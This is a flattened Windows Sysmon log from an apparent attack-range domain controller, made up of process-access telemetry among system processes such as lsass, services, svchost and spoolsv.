10:40:09.877{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.877{733EE690-3DF7-5F80-0A00-000000007F01}8521112C:\Windows\system32\services.exe{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.863{733EE690-3E09-5F80-2A00-000000007F01}2444C:\Windows\System32\spoolsv.exe10.0.14393.3808 (rs1_release.200707-2105)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.859{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.859{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.859{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:09.859{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:08.604{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2500C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:08.604{733EE690-3DF9-5F80-1000-000000007F01}11322944C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2500C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\wer.dll+6dc28|C:\Windows\System32\wer.dll+370d0|C:\Windows\System32\wer.dll+383dc|C:\Windows\System32\wer.dll+13954|C:\Windows\System32\wer.dll+51b6|c:\windows\system32\wuaueng.dll+d4e38|c:\windows\system32\wuaueng.dll+554a8|c:\windows\system32\wuaueng.dll+4e24b|c:\windows\system32\wuaueng.dll+4e49b|c:\windows\system32\wuaueng.dll+4e5fe|c:\windows\system32\wuaueng.dll+4fb28|c:\windows\system32\wuaueng.dll+5c36f|c:\windows\system32\wuaueng.dll+4d1d5|c:\windows\system32\wuaueng.dll+4c805|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:04.479{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:04.479{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:03.354{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3E03-5F80-2700-000000007F01}2248C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 